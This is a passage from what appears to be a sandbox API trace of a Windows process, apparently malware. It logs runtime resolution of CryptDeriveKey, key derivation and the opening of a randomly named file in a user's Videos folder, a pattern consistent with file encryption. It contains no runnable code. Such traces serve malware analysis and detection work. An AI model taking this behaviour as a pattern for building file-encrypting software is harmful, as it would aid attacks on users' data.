hHeap=0x970000) returned 1 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0257.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0257.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0257.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0257.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.267] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0257.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0257.267] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0257.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0257.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0257.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0257.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e516d0 [0257.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e516d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0257.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0257.271] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0257.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0257.346] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87650) returned 1 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0257.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0257.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.348] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0257.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.348] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0257.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0257.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0257.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.348] CryptDestroyHash (hHash=0xa87510) returned 1 [0257.349] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0257.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0257.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/0FMiSmnvsI1v8s.swf" (normalized: "c:\\users\\fd1hvy\\videos\\0fmismnvsi1v8s.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0257.350] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0257.350] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0257.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0257.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0257.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0257.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 